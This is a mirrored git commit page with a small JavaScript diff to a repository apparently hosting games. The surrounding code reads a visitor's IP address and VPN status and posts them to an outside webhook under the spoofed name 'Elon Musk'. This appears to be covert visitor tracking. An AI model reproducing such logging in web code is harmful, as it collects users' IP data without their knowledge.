mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
fix
This commit is contained in:
parent
936a560301
commit
304c612a7a
@ -26,8 +26,8 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g
|
||||
const request = new XMLHttpRequest();
|
||||
request.open("POST", webhook);
|
||||
request.setRequestHeader('Content-type', 'application/json');
|
||||
var usedvpn2 = document.getElementById("usedvpn").value = usedvpn;
|
||||
var userip2 = document.getElementById("userip").value = userip;
|
||||
var usedvpn2 = document.getElementById("usedvpn").value
|
||||
var userip2 = document.getElementById("userip").value
|
||||
var params = {
|
||||
username: "Elon Musk",
|
||||
avatar_url: "",
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user